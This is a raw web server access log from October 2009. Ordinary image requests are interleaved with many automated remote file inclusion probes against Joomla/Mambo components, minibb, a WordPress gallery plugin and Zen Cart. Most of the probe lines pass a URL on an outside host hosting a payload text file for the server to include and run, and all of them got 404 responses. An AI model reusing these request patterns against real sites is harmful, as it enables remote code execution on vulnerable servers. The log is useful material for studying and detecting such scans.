76.27.69.20 - - [13/Oct/2009:00:46:28 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
76.27.69.20 - - [13/Oct/2009:00:46:28 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
217.16.16.226 - - [13/Oct/2009:00:47:09 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indo.home.ro/testv??? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
217.16.16.226 - - [13/Oct/2009:00:47:10 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indo.home.ro/testv??? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
125.251.147.194 - - [13/Oct/2009:00:47:18 -0400] "GET /logs/access_log.Q109073100%20%20//components/minibb/index.php?absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
76.27.69.20 - - [13/Oct/2009:00:47:22 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
76.27.69.20 - - [13/Oct/2009:00:47:22 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
76.27.69.20 - - [13/Oct/2009:00:47:23 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
76.27.69.20 - - [13/Oct/2009:00:47:23 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
76.27.69.20 - - [13/Oct/2009:00:47:24 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
76.27.69.20 - - [13/Oct/2009:00:47:24 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
76.27.69.20 - - [13/Oct/2009:00:47:24 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
76.27.69.20 - - [13/Oct/2009:00:47:24 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
76.27.69.20 - - [13/Oct/2009:00:47:25 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
76.27.69.20 - - [13/Oct/2009:00:47:25 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
76.27.69.20 - - [13/Oct/2009:00:47:26 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
76.27.69.20 - - [13/Oct/2009:00:47:26 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
125.251.147.194 - - [13/Oct/2009:00:47:27 -0400] "GET /logs/access_log.Q109052400%20%20//components/minibb/index.php?absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:00:47:51 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:00:47:51 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:00:47:51 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
62.140.23.192 - - [13/Oct/2009:00:48:52 -0400] "GET //modules/errors.php?error=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
62.140.23.192 - - [13/Oct/2009:00:48:52 -0400] "GET /logs//modules/errors.php?error=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
62.140.23.192 - - [13/Oct/2009:00:48:54 -0400] "GET //modules/errors.php?error=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
62.140.23.192 - - [13/Oct/2009:00:48:54 -0400] "GET /logs//modules/errors.php?error=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:00:49:08 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aniway.net/.../id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:00:49:08 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aniway.net/.../id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:00:49:08 -0400] "GET /logs/access_log.Q109071000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aniway.net/.../id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:00:49:08 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aniway.net/.../id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:00:49:15 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:00:49:15 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:00:49:15 -0400] "GET /logs/access_log.Q109091700/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:00:49:21 -0400] "GET /logs/access_log.Q109052000/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:00:49:25 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:00:49:25 -0400] "GET /logs/access_log.Q109051900/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:00:49:25 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:00:49:26 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:00:49:26 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:00:49:26 -0400] "GET /logs/access_log.Q109091700/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:00:49:30 -0400] "GET /logs/access_log.Q109052000/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:00:49:35 -0400] "GET /logs/error_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:00:49:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.242.37.212 - - [13/Oct/2009:00:50:37 -0400] "GET /logs/access_log.Q109052800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Oct/2009:00:50:46 -0400] "GET /logs/access_log.Q109073100%20%20//components/minibb/index.php?absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Oct/2009:00:50:51 -0400] "GET /logs/access_log.Q109052400%20%20//components/minibb/index.php?absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
200.93.147.154 - - [13/Oct/2009:00:52:21 -0400] "GET /logs/access_log.Q109080200/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
200.93.147.154 - - [13/Oct/2009:00:52:21 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
200.93.147.154 - - [13/Oct/2009:00:52:21 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
200.93.147.154 - - [13/Oct/2009:00:52:32 -0400] "GET /logs/error_log.Q109080200/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
81.174.65.27 - - [13/Oct/2009:00:52:50 -0400] "GET /logs//media.divs.js.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
81.174.65.27 - - [13/Oct/2009:00:52:50 -0400] "GET //media.divs.js.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Oct/2009:00:53:06 -0400] "GET /logs/access_log.Q109073100%20%20//components/minibb/index.php?absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:00:53:27 -0400] "GET /logs/access_log.Q109071000%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aniway.net/.../id1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:00:53:36 -0400] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aniway.net/.../id1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
81.174.65.27 - - [13/Oct/2009:00:54:08 -0400] "GET //media.divs.js.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
81.174.65.27 - - [13/Oct/2009:00:54:08 -0400] "GET /logs//media.divs.js.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
81.174.65.27 - - [13/Oct/2009:00:54:14 -0400] "GET /logs/access_log.Q109090200%20%20//media.divs.js.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:00:54:29 -0400] "GET /logs/error_log.Q109060500%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
81.174.65.27 - - [13/Oct/2009:00:54:32 -0400] "GET /logs//media.divs.js.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
81.174.65.27 - - [13/Oct/2009:00:54:32 -0400] "GET //media.divs.js.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:00:55:08 -0400] "GET /logs/access_log.Q109052400//components/minibb/index.php?absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:00:55:17 -0400] "GET /logs/access_log.Q109052400//components/minibb/index.php?absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:00:56:11 -0400] "GET ////db.php?commonpath=http://aniway.net/.../id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:00:56:11 -0400] "GET /logs////db.php?commonpath=http://aniway.net/.../id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:00:56:11 -0400] "GET /logs/access_log.Q109071100////db.php?commonpath=http://aniway.net/.../id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
208.113.208.209 - - [13/Oct/2009:00:56:31 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mail.metalwrks.com/shar/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
208.113.208.209 - - [13/Oct/2009:00:56:32 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mail.metalwrks.com/shar/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
208.113.208.209 - - [13/Oct/2009:00:56:32 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mail.metalwrks.com/shar/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:56:57 -0400] "GET /logs/access_log.Q109052400//components/minibb/index.php?absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
81.174.65.27 - - [13/Oct/2009:00:56:59 -0400] "GET //media.divs.js.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
81.174.65.27 - - [13/Oct/2009:00:56:59 -0400] "GET /logs//media.divs.js.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:57:11 -0400] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:57:11 -0400] "GET /logs/access_log.Q109080400//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:57:11 -0400] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:57:15 -0400] "GET /logs/access_log.Q109051700//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:57:25 -0400] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:57:25 -0400] "GET /logs/access_log.Q109080400//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:57:25 -0400] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:57:28 -0400] "GET /logs/access_log.Q109051700//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.54.177.242 - - [13/Oct/2009:00:57:33 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ciudad.latinol.com//merol/fx29id.txt?? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
200.54.177.242 - - [13/Oct/2009:00:57:34 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ciudad.latinol.com//merol/fx29id.txt?? HTTP/1.0" 404 260 "-" "Mozilla/5.0"
200.54.177.242 - - [13/Oct/2009:00:57:34 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ciudad.latinol.com//merol/fx29id.txt?? HTTP/1.0" 404 282 "-" "Mozilla/5.0"
208.113.208.209 - - [13/Oct/2009:00:57:39 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mail.metalwrks.com/shar/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
218.27.203.107 - - [13/Oct/2009:00:57:49 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.27.203.107 - - [13/Oct/2009:00:57:49 -0400] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
218.27.203.107 - - [13/Oct/2009:00:57:49 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
76.127.212.248 - - [13/Oct/2009:00:58:04 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
76.127.212.248 - - [13/Oct/2009:00:58:04 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
76.127.212.248 - - [13/Oct/2009:00:58:05 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
76.127.212.248 - - [13/Oct/2009:00:58:05 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
200.93.147.154 - - [13/Oct/2009:00:58:35 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
200.93.147.154 - - [13/Oct/2009:00:58:35 -0400] "GET /logs/access_log.Q109080200/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
200.93.147.154 - - [13/Oct/2009:00:58:35 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
174.143.3.188 - - [13/Oct/2009:00:58:38 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
174.143.3.188 - - [13/Oct/2009:00:58:38 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
174.143.3.188 - - [13/Oct/2009:00:58:38 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
174.143.3.188 - - [13/Oct/2009:00:58:38 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
218.234.21.178 - - [13/Oct/2009:00:58:39 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.234.21.178 - - [13/Oct/2009:00:58:39 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
